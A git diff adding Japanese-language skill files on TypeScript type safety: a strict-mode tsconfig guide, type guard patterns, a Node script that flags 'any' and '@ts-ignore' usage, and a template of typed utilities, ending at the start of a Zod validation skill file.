+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/type-safety-patterns/resources/strict-mode-guide.md
+++ b/.claude/skills/type-safety-patterns/resources/strict-mode-guide.md
@@ -1,0 +1,343 @@
+# TypeScript厳格モード設定ガイド
+
+## 概要
+
+TypeScriptの厳格モード設定により、より安全なコードを書くための設定と
+各オプションの効果を解説します。
+
+## 推奨設定
+
+```json
+{
+  "compilerOptions": {
+    // === 厳格モード ===
+    "strict": true,
+
+    // === 追加の厳格オプション ===
+    "noUncheckedIndexedAccess": true,
+    "exactOptionalPropertyTypes": true,
+    "noImplicitReturns": true,
+    "noFallthroughCasesInSwitch": true,
+    "noPropertyAccessFromIndexSignature": true,
+    "forceConsistentCasingInFileNames": true,
+
+    // === 型チェック強化 ===
+    "skipLibCheck": true,
+    "isolatedModules": true,
+    "esModuleInterop": true,
+    "resolveJsonModule": true
+  }
+}
+```
+
+## 各オプションの詳細
+
+### strict: true
+
+`strict: true` は以下のオプションをすべて有効化します：
+
+#### strictNullChecks
+
+null と undefined を明示的に処理することを強制。
+
+```typescript
+// ❌ strictNullChecks: false（危険）
+function getLength(str: string) {
+  return str.length; // str が null の場合、ランタイムエラー
+}
+
+// ✅ strictNullChecks: true（安全）
+function getLength(str: string | null): number {
+  if (str === null) {
+    return 0;
+  }
+  return str.length;
+}
+```
+
+#### strictBindCallApply
+
+bind, call, apply の引数を厳密にチェック。
+
+```typescript
+function greet(name: string, age: number) {
+  console.log(`${name} is ${age}`);
+}
+
+// ❌ 型エラー
+greet.call(undefined, 'John'); // age が不足
+greet.apply(undefined, ['John', 'thirty']); // age が string
+
+// ✅ 正しい使用
+greet.call(undefined, 'John', 30);
+greet.apply(undefined, ['John', 30]);
+```
+
+#### strictFunctionTypes
+
+関数の引数の型を厳密にチェック（反変性）。
+
+```typescript
+interface Animal { name: string }
+interface Dog extends Animal { breed: string }
+
+type Handler<T> = (value: T) => void;
+
+declare let animalHandler: Handler<Animal>;
+declare let dogHandler: Handler<Dog>;
+
+// ❌ strictFunctionTypes: true では型エラー
+// animalHandler = dogHandler;
+
+// ✅ 正しい代入
+dogHandler = animalHandler;
+```
+
+#### strictPropertyInitialization
+
+クラスプロパティの初期化を強制。
+
+```typescript
+// ❌ 初期化されていないプロパティ
+class User {
+  name: string; // エラー
+  email: string; // エラー
+}
+
+// ✅ 正しい初期化
+class User {
+  name: string;
+  email: string;
+
+  constructor(name: string, email: string) {
+    this.name = name;
+    this.email = email;
+  }
+}
+
+// または definite assignment assertion
+class User {
+  name!: string; // 後で初期化されることを明示
+  email!: string;
+}
+```
+
+#### noImplicitAny
+
+暗黙の any を禁止。
+
+```typescript
+// ❌ 暗黙の any
+function process(data) {
+  // data は any 型として推論される
+  return data.value;
+}
+
+// ✅ 明示的な型
+function process(data: { value: string }): string {
+  return data.value;
+}
+```
+
+#### noImplicitThis
+
+暗黙の this を禁止。
+
+```typescript
+// ❌ 暗黙の this
+const obj = {
+  value: 42,
+  getValue() {
+    return function() {
+      return this.value; // this は any
+    };
+  }
+};
+
+// ✅ 明示的な this または アロー関数
+const obj = {
+  value: 42,
+  getValue() {
+    return () => {
+      return this.value; // this は obj を参照
+    };
+  }
+};
+```
+
+#### useUnknownInCatchVariables
+
+catch の引数を unknown 型に。
+
+```typescript
+// ✅ useUnknownInCatchVariables: true
+try {
+  throw new Error('Something went wrong');
+} catch (error) {
+  // error は unknown 型
+  if (error instanceof Error) {
+    console.log(error.message);
+  }
+}
+```
+
+### 追加の厳格オプション
+
+#### noUncheckedIndexedAccess
+
+配列やオブジェクトのインデックスアクセスに undefined を含める。
+
+```typescript
+const arr = [1, 2, 3];
+const obj: Record<string, number> = { a: 1, b: 2 };
+
+// noUncheckedIndexedAccess: true
+const value1 = arr[0]; // number | undefined
+const value2 = obj['a']; // number | undefined
+
+// 安全なアクセス
+if (value1 !== undefined) {
+  console.log(value1.toFixed(2));
+}
+
+// または Non-null assertion（確信がある場合のみ）
+const value3 = arr[0]!; // number
+```
+
+#### exactOptionalPropertyTypes
+
+オプショナルプロパティに undefined を明示的に代入することを禁止。
+
+```typescript
+interface Config {
+  name: string;
+  timeout?: number;
+}
+
+// ❌ exactOptionalPropertyTypes: true ではエラー
+const config: Config = {
+  name: 'app',
+  timeout: undefined, // エラー
+};
+
+// ✅ 正しい使用
+const config: Config = {
+  name: 'app',
+  // timeout を省略
+};
+
+// または
+interface Config {
+  name: string;
+  timeout?: number | undefined; // undefined を許可
+}
+```
+
+#### noImplicitReturns
+
+すべてのコードパスで戻り値を返すことを強制。
+
+```typescript
+// ❌ 暗黙の undefined 返却
+function getValue(condition: boolean): string {
+  if (condition) {
+    return 'value';
+  }
+  // return がない
+}
+
+// ✅ すべてのパスで return
+function getValue(condition: boolean): string {
+  if (condition) {
+    return 'value';
+  }
+  return 'default';
+}
+```
+
+#### noFallthroughCasesInSwitch
+
+switch の case に break/return がないことを警告。
+
+```typescript
+// ❌ フォールスルー
+switch (value) {
+  case 1:
+    console.log('one');
+    // break がない
+  case 2:
+    console.log('two');
+    break;
+}
+
+// ✅ 明示的なフォールスルー
+switch (value) {
+  case 1:
+  case 2: // 意図的なフォールスルー
+    console.log('one or two');
+    break;
+}
+```
+
+#### noPropertyAccessFromIndexSignature
+
+インデックスシグネチャへのドットアクセスを禁止。
+
+```typescript
+interface StringMap {
+  [key: string]: string;
+}
+
+const map: StringMap = { foo: 'bar' };
+
+// ❌ ドットアクセス
+const value1 = map.foo; // エラー
+
+// ✅ ブラケットアクセス
+const value2 = map['foo']; // OK
+```
+
+## 段階的な導入
+
+### Phase 1: 基本的な厳格性
+
+```json
+{
+  "compilerOptions": {
+    "strict": true
+  }
+}
+```
+
+### Phase 2: 追加の安全性
+
+```json
+{
+  "compilerOptions": {
+    "strict": true,
+    "noImplicitReturns": true,
+    "noFallthroughCasesInSwitch": true
+  }
+}
+```
+
+### Phase 3: 最高レベルの厳格性
+
+```json
+{
+  "compilerOptions": {
+    "strict": true,
+    "noUncheckedIndexedAccess": true,
+    "exactOptionalPropertyTypes": true,
+    "noImplicitReturns": true,
+    "noFallthroughCasesInSwitch": true,
+    "noPropertyAccessFromIndexSignature": true
+  }
+}
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/type-safety-patterns/resources/type-guard-patterns.md
+++ b/.claude/skills/type-safety-patterns/resources/type-guard-patterns.md
@@ -1,0 +1,363 @@
+# 型ガードパターン
+
+## 概要
+
+型ガードを使用して、ランタイムで型を安全に判別し、
+TypeScriptの型推論を活用するパターンを解説します。
+
+## 組み込み型ガード
+
+### typeof 型ガード
+
+プリミティブ型の判別に使用。
+
+```typescript
+type Primitive = string | number | boolean | null | undefined;
+
+function processPrimitive(value: Primitive): string {
+  if (typeof value === 'string') {
+    return value.toUpperCase();
+  }
+  if (typeof value === 'number') {
+    return value.toFixed(2);
+  }
+  if (typeof value === 'boolean') {
+    return value ? 'Yes' : 'No';
+  }
+  return 'N/A';
+}
+
+// typeofで判別可能な型
+// 'string', 'number', 'bigint', 'boolean', 'symbol', 'undefined', 'object', 'function'
+```
+
+### instanceof 型ガード
+
+クラスインスタンスの判別に使用。
+
+```typescript
+class ApiError extends Error {
+  statusCode: number;
+  constructor(message: string, statusCode: number) {
+    super(message);
+    this.statusCode = statusCode;
+  }
+}
+
+class ValidationError extends Error {
+  fields: string[];
+  constructor(message: string, fields: string[]) {
+    super(message);
+    this.fields = fields;
+  }
+}
+
+function handleError(error: Error) {
+  if (error instanceof ApiError) {
+    console.log(`API Error ${error.statusCode}: ${error.message}`);
+  } else if (error instanceof ValidationError) {
+    console.log(`Validation Error: ${error.fields.join(', ')}`);
+  } else {
+    console.log(`Unknown Error: ${error.message}`);
+  }
+}
+```
+
+### in 型ガード
+
+オブジェクトのプロパティ存在チェック。
+
+```typescript
+interface Bird {
+  fly(): void;
+  layEggs(): void;
+}
+
+interface Fish {
+  swim(): void;
+  layEggs(): void;
+}
+
+function move(animal: Bird | Fish) {
+  if ('fly' in animal) {
+    animal.fly();
+  } else {
+    animal.swim();
+  }
+}
+```
+
+## カスタム型ガード
+
+### 基本的な型述語
+
+```typescript
+// 型述語を使用したカスタム型ガード
+function isString(value: unknown): value is string {
+  return typeof value === 'string';
+}
+
+function isNumber(value: unknown): value is number {
+  return typeof value === 'number' && !Number.isNaN(value);
+}
+
+function isNonNullable<T>(value: T): value is NonNullable<T> {
+  return value !== null && value !== undefined;
+}
+
+// 使用例
+function processValue(value: unknown) {
+  if (isString(value)) {
+    return value.toUpperCase();
+  }
+  if (isNumber(value)) {
+    return value.toFixed(2);
+  }
+  return null;
+}
+```
+
+### オブジェクト型の型ガード
+
+```typescript
+interface User {
+  id: string;
+  name: string;
+  email: string;
+}
+
+interface Admin extends User {
+  permissions: string[];
+}
+
+// User型ガード
+function isUser(value: unknown): value is User {
+  return (
+    typeof value === 'object' &&
+    value !== null &&
+    'id' in value &&
+    'name' in value &&
+    'email' in value &&
+    typeof (value as User).id === 'string' &&
+    typeof (value as User).name === 'string' &&
+    typeof (value as User).email === 'string'
+  );
+}
+
+// Admin型ガード（Userを拡張）
+function isAdmin(value: unknown): value is Admin {
+  return (
+    isUser(value) &&
+    'permissions' in value &&
+    Array.isArray((value as Admin).permissions)
+  );
+}
+```
+
+### 配列の型ガード
+
+```typescript
+// 型付き配列チェック
+function isStringArray(value: unknown): value is string[] {
+  return Array.isArray(value) && value.every((item) => typeof item === 'string');
+}
+
+function isNumberArray(value: unknown): value is number[] {
+  return Array.isArray(value) && value.every((item) => typeof item === 'number');
+}
+
+// ジェネリック配列型ガード
+function isArrayOf<T>(
+  value: unknown,
+  guard: (item: unknown) => item is T
+): value is T[] {
+  return Array.isArray(value) && value.every(guard);
+}
+
+// 使用例
+const data: unknown = ['a', 'b', 'c'];
+if (isArrayOf(data, isString)) {
+  // data は string[] として認識
+  data.map((s) => s.toUpperCase());
+}
+```
+
+### Zodを使用した型ガード
+
+```typescript
+import { z } from 'zod';
+
+const userSchema = z.object({
+  id: z.string().uuid(),
+  name: z.string(),
+  email: z.string().email(),
+});
+
+type User = z.infer<typeof userSchema>;
+
+// Zodスキーマを型ガードとして使用
+function isUser(value: unknown): value is User {
+  return userSchema.safeParse(value).success;
+}
+
+// より詳細なエラー情報が必要な場合
+function validateUser(value: unknown): { valid: true; data: User } | { valid: false; errors: z.ZodError } {
+  const result = userSchema.safeParse(value);
+  if (result.success) {
+    return { valid: true, data: result.data };
+  }
+  return { valid: false, errors: result.error };
+}
+```
+
+## 高度なパターン
+
+### アサーション関数
+
+```typescript
+// asserts キーワードを使用
+function assertIsString(value: unknown): asserts value is string {
+  if (typeof value !== 'string') {
+    throw new Error(`Expected string, got ${typeof value}`);
+  }
+}
+
+function assertIsNonNull<T>(value: T): asserts value is NonNullable<T> {
+  if (value === null || value === undefined) {
+    throw new Error('Value is null or undefined');
+  }
+}
+
+// 使用例
+function processData(data: unknown) {
+  assertIsString(data);
+  // この時点で data は string 型
+  return data.toUpperCase();
+}
+```
+
+### 複合型ガード
+
+```typescript
+// 複数の型を判別する型ガード
+type ApiResponse<T> =
+  | { success: true; data: T }
+  | { success: false; error: { code: string; message: string } };
+
+function isSuccessResponse<T>(
+  response: ApiResponse<T>
+): response is { success: true; data: T } {
+  return response.success === true;
+}
+
+function isErrorResponse<T>(
+  response: ApiResponse<T>
+): response is { success: false; error: { code: string; message: string } } {
+  return response.success === false;
+}
+
+// 使用例
+async function fetchData<T>(url: string): Promise<T> {
+  const response: ApiResponse<T> = await fetch(url).then((r) => r.json());
+
+  if (isSuccessResponse(response)) {
+    return response.data;
+  }
+
+  throw new Error(`${response.error.code}: ${response.error.message}`);
+}
+```
+
+### 型の絞り込みと網羅性チェック
+
+```typescript
+type Shape =
+  | { kind: 'circle'; radius: number }
+  | { kind: 'rectangle'; width: number; height: number }
+  | { kind: 'triangle'; base: number; height: number };
+
+function isCircle(shape: Shape): shape is { kind: 'circle'; radius: number } {
+  return shape.kind === 'circle';
+}
+
+function isRectangle(shape: Shape): shape is { kind: 'rectangle'; width: number; height: number } {
+  return shape.kind === 'rectangle';
+}
+
+function isTriangle(shape: Shape): shape is { kind: 'triangle'; base: number; height: number } {
+  return shape.kind === 'triangle';
+}
+
+// 網羅性チェック付きの処理
+function getArea(shape: Shape): number {
+  if (isCircle(shape)) {
+    return Math.PI * shape.radius ** 2;
+  }
+  if (isRectangle(shape)) {
+    return shape.width * shape.height;
+  }
+  if (isTriangle(shape)) {
+    return (shape.base * shape.height) / 2;
+  }
+  // 網羅性チェック
+  const _exhaustiveCheck: never = shape;
+  return _exhaustiveCheck;
+}
+```
+
+## ベストプラクティス
+
+### 1. 型ガードの再利用性
+
+```typescript
+// ✅ 再利用可能な型ガードを作成
+const guards = {
+  isString: (value: unknown): value is string => typeof value === 'string',
+  isNumber: (value: unknown): value is number => typeof value === 'number',
+  isObject: (value: unknown): value is Record<string, unknown> =>
+    typeof value === 'object' && value !== null,
+};
+
+// 使用
+if (guards.isString(data)) {
+  // ...
+}
+```
+
+### 2. エラーメッセージの明確化
+
+```typescript
+function assertIsUser(value: unknown): asserts value is User {
+  if (!isUser(value)) {
+    throw new TypeError(
+      `Invalid user object. Expected { id: string, name: string, email: string }, ` +
+      `got ${JSON.stringify(value)}`
+    );
+  }
+}
+```
+
+### 3. 型ガードのテスト
+
+```typescript
+import { describe, it, expect } from 'vitest';
+
+describe('isUser', () => {
+  it('should return true for valid user', () => {
+    const user = { id: '123', name: 'John', email: 'john@example.com' };
+    expect(isUser(user)).toBe(true);
+  });
+
+  it('should return false for invalid user', () => {
+    expect(isUser(null)).toBe(false);
+    expect(isUser({})).toBe(false);
+    expect(isUser({ id: 123 })).toBe(false);
+  });
+});
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/type-safety-patterns/scripts/check-type-safety.mjs
+++ b/.claude/skills/type-safety-patterns/scripts/check-type-safety.mjs
@@ -1,0 +1,261 @@
+#!/usr/bin/env node
+/**
+ * 型安全性チェックスクリプト
+ * TypeScriptファイルの型安全性パターンを検証します
+ *
+ * 使用方法:
+ *   node check-type-safety.mjs <file.ts> [--strict] [--fix-suggestions]
+ *
+ * オプション:
+ *   --strict          厳格モードでチェック
+ *   --fix-suggestions 修正提案を表示
+ */
+
+import { readFileSync, existsSync } from 'fs';
+import { resolve } from 'path';
+
+// チェックルール定義
+const RULES = {
+  // 危険なパターン
+  dangerous: [
+    {
+      pattern: /as\s+any\b/g,
+      message: 'as any の使用は型安全性を損ないます',
+      severity: 'error',
+      suggestion: '具体的な型を指定するか、unknown を使用してください',
+    },
+    {
+      pattern: /:\s*any\b/g,
+      message: 'any 型の使用は避けてください',
+      severity: 'error',
+      suggestion: 'unknown または具体的な型を使用してください',
+    },
+    {
+      pattern: /!\./g,
+      message: 'Non-null assertion (!) の過度な使用',
+      severity: 'warning',
+      suggestion: 'Optional chaining (?.) または適切な null チェックを使用してください',
+    },
+    {
+      pattern: /@ts-ignore/g,
+      message: '@ts-ignore は型チェックを無効化します',
+      severity: 'error',
+      suggestion: '@ts-expect-error を使用し、理由をコメントで説明してください',
+    },
+    {
+      pattern: /@ts-nocheck/g,
+      message: '@ts-nocheck はファイル全体の型チェックを無効化します',
+      severity: 'error',
+      suggestion: '個別のエラーに対処してください',
+    },
+  ],
+
+  // 推奨パターン
+  recommended: [
+    {
+      pattern: /function\s+\w+\s*\([^)]*\)\s*{/g,
+      antiPattern: /function\s+\w+\s*\([^)]*\)\s*:\s*\w+/g,
+      message: '関数に戻り値の型注釈がありません',
+      severity: 'warning',
+      suggestion: '明示的な戻り値の型を追加してください',
+    },
+    {
+      pattern: /catch\s*\(\s*(\w+)\s*\)\s*{/g,
+      check: (match, content) => {
+        const varName = match[1];
+        return !content.includes(`${varName} instanceof`) && !content.includes(`${varName} as`);
+      },
+      message: 'catch 変数の型チェックがありません',
+      severity: 'warning',
+      suggestion: 'instanceof でエラー型を確認してください',
+    },
+  ],
+
+  // 型ガードパターン
+  typeGuards: [
+    {
+      pattern: /typeof\s+\w+\s*===?\s*['"](\w+)['"]/g,
+      valid: ['string', 'number', 'boolean', 'undefined', 'object', 'function', 'symbol', 'bigint'],
+      message: '無効な typeof 比較',
+      severity: 'error',
+    },
+  ],
+
+  // Discriminated Union パターン
+  discriminatedUnion: [
+    {
+      pattern: /switch\s*\(\s*\w+\.(\w+)\s*\)/g,
+      checkExhaustive: true,
+      message: 'switch 文に網羅性チェックがない可能性があります',
+      severity: 'info',
+      suggestion: 'default ケースで assertNever を使用してください',
+    },
+  ],
+};
+
+// 結果フォーマッター
+function formatResult(results, filePath) {
+  const errors = results.filter((r) => r.severity === 'error');
+  const warnings = results.filter((r) => r.severity === 'warning');
+  const infos = results.filter((r) => r.severity === 'info');
+
+  console.log(`\n📄 ${filePath}`);
+  console.log('─'.repeat(60));
+
+  if (results.length === 0) {
+    console.log('✅ 型安全性の問題は検出されませんでした');
+    return { passed: true, errors: 0, warnings: 0 };
+  }
+
+  // エラー表示
+  if (errors.length > 0) {
+    console.log(`\n❌ エラー (${errors.length}):`);
+    errors.forEach((e) => {
+      console.log(`  L${e.line}: ${e.message}`);
+      if (e.suggestion) {
+        console.log(`     💡 ${e.suggestion}`);
+      }
+    });
+  }
+
+  // 警告表示
+  if (warnings.length > 0) {
+    console.log(`\n⚠️  警告 (${warnings.length}):`);
+    warnings.forEach((w) => {
+      console.log(`  L${w.line}: ${w.message}`);
+      if (w.suggestion) {
+        console.log(`     💡 ${w.suggestion}`);
+      }
+    });
+  }
+
+  // 情報表示
+  if (infos.length > 0) {
+    console.log(`\n💡 情報 (${infos.length}):`);
+    infos.forEach((i) => {
+      console.log(`  L${i.line}: ${i.message}`);
+      if (i.suggestion) {
+        console.log(`     💡 ${i.suggestion}`);
+      }
+    });
+  }
+
+  // サマリー
+  console.log('\n' + '─'.repeat(60));
+  console.log(`📊 サマリー: ${errors.length} エラー, ${warnings.length} 警告, ${infos.length} 情報`);
+
+  return {
+    passed: errors.length === 0,
+    errors: errors.length,
+    warnings: warnings.length,
+  };
+}
+
+// 行番号を取得
+function getLineNumber(content, index) {
+  return content.substring(0, index).split('\n').length;
+}
+
+// ファイルをチェック
+function checkFile(filePath, options = {}) {
+  if (!existsSync(filePath)) {
+    console.error(`❌ ファイルが見つかりません: ${filePath}`);
+    process.exit(1);
+  }
+
+  const content = readFileSync(filePath, 'utf-8');
+  const results = [];
+
+  // 危険なパターンをチェック
+  RULES.dangerous.forEach((rule) => {
+    let match;
+    while ((match = rule.pattern.exec(content)) !== null) {
+      results.push({
+        line: getLineNumber(content, match.index),
+        message: rule.message,
+        severity: rule.severity,
+        suggestion: options.fixSuggestions ? rule.suggestion : undefined,
+      });
+    }
+  });
+
+  // 推奨パターンをチェック
+  if (options.strict) {
+    RULES.recommended.forEach((rule) => {
+      let match;
+      while ((match = rule.pattern.exec(content)) !== null) {
+        // アンチパターンがあれば問題なし
+        if (rule.antiPattern) {
+          const antiMatch = rule.antiPattern.exec(content);
+          if (antiMatch && antiMatch.index === match.index) {
+            continue;
+          }
+        }
+        // カスタムチェック
+        if (rule.check && !rule.check(match, content)) {
+          continue;
+        }
+        results.push({
+          line: getLineNumber(content, match.index),
+          message: rule.message,
+          severity: rule.severity,
+          suggestion: options.fixSuggestions ? rule.suggestion : undefined,
+        });
+      }
+    });
+  }
+
+  // Discriminated Union チェック
+  RULES.discriminatedUnion.forEach((rule) => {
+    let match;
+    while ((match = rule.pattern.exec(content)) !== null) {
+      // default ケースがあるかチェック
+      const switchContent = content.substring(match.index, match.index + 500);
+      if (!switchContent.includes('default:') && !switchContent.includes('assertNever')) {
+        results.push({
+          line: getLineNumber(content, match.index),
+          message: rule.message,
+          severity: rule.severity,
+          suggestion: options.fixSuggestions ? rule.suggestion : undefined,
+        });
+      }
+    }
+  });
+
+  return formatResult(results, filePath);
+}
+
+// メイン処理
+function main() {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0 || args.includes('--help')) {
+    console.log(`
+型安全性チェックスクリプト
+
+使用方法:
+  node check-type-safety.mjs <file.ts> [options]
+
+オプション:
+  --strict          厳格モードでチェック（推奨パターンも検証）
+  --fix-suggestions 修正提案を表示
+  --help            ヘルプを表示
+
+例:
+  node check-type-safety.mjs src/api.ts
+  node check-type-safety.mjs src/api.ts --strict --fix-suggestions
+`);
+    process.exit(0);
+  }
+
+  const filePath = resolve(args.find((a) => !a.startsWith('--')));
+  const options = {
+    strict: args.includes('--strict'),
+    fixSuggestions: args.includes('--fix-suggestions'),
+  };
+
+  const result = checkFile(filePath, options);
+  process.exit(result.passed ? 0 : 1);
+}
+
+main();

--- a/.claude/skills/type-safety-patterns/templates/type-safe-patterns.ts
+++ b/.claude/skills/type-safety-patterns/templates/type-safe-patterns.ts
@@ -1,0 +1,306 @@
+/**
+ * 型安全パターンテンプレート
+ *
+ * TypeScriptの型安全性を最大化するためのパターン集です。
+ * 実際のプロジェクトでこれらのパターンを適用してください。
+ *
+ * @example
+ * // このファイルをコピーして、プロジェクトの型定義に活用
+ * cp templates/type-safe-patterns.ts src/types/patterns.ts
+ */
+
+// ============================================================
+// 1. Result型パターン - エラーハンドリングの型安全化
+// ============================================================
+
+/**
+ * 成功または失敗を表すResult型
+ * 例外を使わない明示的なエラーハンドリング
+ */
+export type Result<T, E = Error> = { ok: true; value: T } | { ok: false; error: E };
+
+/** 成功を作成 */
+export function ok<T>(value: T): Result<T, never> {
+  return { ok: true, value };
+}
+
+/** 失敗を作成 */
+export function err<E>(error: E): Result<never, E> {
+  return { ok: false, error };
+}
+
+/** Result型のマップ処理 */
+export function mapResult<T, U, E>(result: Result<T, E>, fn: (value: T) => U): Result<U, E> {
+  if (result.ok) {
+    return ok(fn(result.value));
+  }
+  return result;
+}
+
+/** Result型のフラットマップ処理 */
+export function flatMapResult<T, U, E>(
+  result: Result<T, E>,
+  fn: (value: T) => Result<U, E>
+): Result<U, E> {
+  if (result.ok) {
+    return fn(result.value);
+  }
+  return result;
+}
+
+// 使用例:
+// function divide(a: number, b: number): Result<number, string> {
+//   if (b === 0) return err('Division by zero');
+//   return ok(a / b);
+// }
+
+// ============================================================
+// 2. Option型パターン - null安全の型表現
+// ============================================================
+
+/**
+ * 値の存在/不在を表すOption型
+ * null/undefinedの安全な取り扱い
+ */
+export type Option<T> = { some: true; value: T } | { some: false };
+
+/** 値が存在する場合 */
+export function some<T>(value: T): Option<T> {
+  return { some: true, value };
+}
+
+/** 値が存在しない場合 */
+export function none<T>(): Option<T> {
+  return { some: false };
+}
+
+/** nullable値をOption型に変換 */
+export function fromNullable<T>(value: T | null | undefined): Option<T> {
+  return value == null ? none() : some(value);
+}
+
+/** Option型からnullable値に変換 */
+export function toNullable<T>(option: Option<T>): T | null {
+  return option.some ? option.value : null;
+}
+
+// ============================================================
+// 3. 型ガードユーティリティ
+// ============================================================
+
+/** 文字列型ガード */
+export function isString(value: unknown): value is string {
+  return typeof value === 'string';
+}
+
+/** 数値型ガード */
+export function isNumber(value: unknown): value is number {
+  return typeof value === 'number' && !Number.isNaN(value);
+}
+
+/** オブジェクト型ガード */
+export function isObject(value: unknown): value is Record<string, unknown> {
+  return typeof value === 'object' && value !== null && !Array.isArray(value);
+}
+
+/** 配列型ガード（ジェネリック） */
+export function isArrayOf<T>(value: unknown, guard: (item: unknown) => item is T): value is T[] {
+  return Array.isArray(value) && value.every(guard);
+}
+
+/** NonNullable型ガード */
+export function isNonNullable<T>(value: T): value is NonNullable<T> {
+  return value !== null && value !== undefined;
+}
+
+/** プロパティ存在チェック型ガード */
+export function hasProperty<K extends string>(
+  obj: unknown,
+  key: K
+): obj is Record<K, unknown> {
+  return isObject(obj) && key in obj;
+}
+
+// ============================================================
+// 4. アサーション関数
+// ============================================================
+
+/** 値が存在することをアサート */
+export function assertNonNull<T>(value: T, message?: string): asserts value is NonNullable<T> {
+  if (value === null || value === undefined) {
+    throw new Error(message ?? 'Value is null or undefined');
+  }
+}
+
+/** 条件が真であることをアサート */
+export function assertCondition(condition: boolean, message?: string): asserts condition {
+  if (!condition) {
+    throw new Error(message ?? 'Assertion failed');
+  }
+}
+
+/** 網羅性チェック用のneverアサーション */
+export function assertNever(value: never, message?: string): never {
+  throw new Error(message ?? `Unexpected value: ${JSON.stringify(value)}`);
+}
+
+// ============================================================
+// 5. Discriminated Unionパターン
+// ============================================================
+
+/**
+ * APIレスポンスの状態を表すDiscriminated Union
+ */
+export type ApiState<T, E = Error> =
+  | { status: 'idle' }
+  | { status: 'loading' }
+  | { status: 'success'; data: T; timestamp: Date }
+  | { status: 'error'; error: E; retryCount: number };
+
+/** API状態の初期値 */
+export function createIdleState<T, E = Error>(): ApiState<T, E> {
+  return { status: 'idle' };
+}
+
+/** ローディング状態 */
+export function createLoadingState<T, E = Error>(): ApiState<T, E> {
+  return { status: 'loading' };
+}
+
+/** 成功状態 */
+export function createSuccessState<T, E = Error>(data: T): ApiState<T, E> {
+  return { status: 'success', data, timestamp: new Date() };
+}
+
+/** エラー状態 */
+export function createErrorState<T, E = Error>(error: E, retryCount = 0): ApiState<T, E> {
+  return { status: 'error', error, retryCount };
+}
+
+/**
+ * フォーム状態のDiscriminated Union
+ */
+export type FormState<T extends Record<string, unknown>> =
+  | { status: 'pristine'; values: T }
+  | { status: 'dirty'; values: T; changedFields: (keyof T)[] }
+  | { status: 'submitting'; values: T }
+  | { status: 'submitted'; values: T; response: unknown }
+  | { status: 'error'; values: T; errors: Partial<Record<keyof T, string[]>> };
+
+// ============================================================
+// 6. 型安全なイベントエミッター
+// ============================================================
+
+/**
+ * 型安全なイベントエミッター
+ */
+export class TypedEventEmitter<TEvents extends Record<string, unknown>> {
+  private listeners = new Map<keyof TEvents, Set<(payload: unknown) => void>>();
+
+  on<K extends keyof TEvents>(event: K, listener: (payload: TEvents[K]) => void): () => void {
+    if (!this.listeners.has(event)) {
+      this.listeners.set(event, new Set());
+    }
+    this.listeners.get(event)!.add(listener as (payload: unknown) => void);
+
+    // unsubscribe関数を返す
+    return () => {
+      this.listeners.get(event)?.delete(listener as (payload: unknown) => void);
+    };
+  }
+
+  emit<K extends keyof TEvents>(event: K, payload: TEvents[K]): void {
+    this.listeners.get(event)?.forEach((listener) => listener(payload));
+  }
+
+  off<K extends keyof TEvents>(event: K, listener: (payload: TEvents[K]) => void): void {
+    this.listeners.get(event)?.delete(listener as (payload: unknown) => void);
+  }
+}
+
+// 使用例:
+// type AppEvents = {
+//   login: { userId: string };
+//   logout: undefined;
+//   error: { message: string; code: number };
+// };
+// const emitter = new TypedEventEmitter<AppEvents>();
+// emitter.on('login', (payload) => console.log(payload.userId));
+
+// ============================================================
+// 7. ユーティリティ型
+// ============================================================
+
+/** DeepPartial - ネストされたすべてのプロパティをオプショナルに */
+export type DeepPartial<T> = T extends object ? { [P in keyof T]?: DeepPartial<T[P]> } : T;
+
+/** DeepReadonly - ネストされたすべてのプロパティを読み取り専用に */
+export type DeepReadonly<T> = T extends object
+  ? { readonly [P in keyof T]: DeepReadonly<T[P]> }
+  : T;
+
+/** Nullable - 型にnullを許可 */
+export type Nullable<T> = T | null;
+
+/** Optional - 型にundefinedを許可 */
+export type Optional<T> = T | undefined;
+
+/** Maybe - 型にnullとundefinedを許可 */
+export type Maybe<T> = T | null | undefined;
+
+/** StrictOmit - 存在するキーのみ除外可能 */
+export type StrictOmit<T, K extends keyof T> = Pick<T, Exclude<keyof T, K>>;
+
+/** StrictPick - 存在するキーのみ選択可能 */
+export type StrictPick<T, K extends keyof T> = Pick<T, K>;
+
+/** RequireAtLeastOne - 少なくとも1つのプロパティが必須 */
+export type RequireAtLeastOne<T, Keys extends keyof T = keyof T> = Pick<T, Exclude<keyof T, Keys>> &
+  {
+    [K in Keys]-?: Required<Pick<T, K>> & Partial<Pick<T, Exclude<Keys, K>>>;
+  }[Keys];
+
+/** RequireOnlyOne - 1つだけのプロパティが必須 */
+export type RequireOnlyOne<T, Keys extends keyof T = keyof T> = Pick<T, Exclude<keyof T, Keys>> &
+  {
+    [K in Keys]-?: Required<Pick<T, K>> & Partial<Record<Exclude<Keys, K>, never>>;
+  }[Keys];
+
+// ============================================================
+// 8. ブランド型（名義型）
+// ============================================================
+
+/** ブランド型を作成するためのユーティリティ */
+declare const __brand: unique symbol;
+export type Brand<T, TBrand extends string> = T & { [__brand]: TBrand };
+
+/** ブランド型の例 */
+export type UserId = Brand<string, 'UserId'>;
+export type Email = Brand<string, 'Email'>;
+export type PositiveNumber = Brand<number, 'PositiveNumber'>;
+
+/** UserId作成関数 */
+export function createUserId(id: string): UserId {
+  // バリデーションロジックを追加
+  if (!id || id.length === 0) {
+    throw new Error('Invalid user ID');
+  }
+  return id as UserId;
+}
+
+/** Email作成関数 */
+export function createEmail(email: string): Email {
+  const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
+  if (!emailRegex.test(email)) {
+    throw new Error('Invalid email format');
+  }
+  return email as Email;
+}
+
+/** PositiveNumber作成関数 */
+export function createPositiveNumber(n: number): PositiveNumber {
+  if (n <= 0 || !Number.isFinite(n)) {
+    throw new Error('Number must be positive');
+  }
+  return n as PositiveNumber;
+}

--- a/.claude/skills/zod-validation/SKILL.md
+++ b/.claude/skills/zod-validation/SKILL.md
@@ -1,0 +1,275 @@
+---
+name: zod-validation
+description: |
+  Zodライブラリによるランタイムバリデーションと型推論を専門とするスキル。
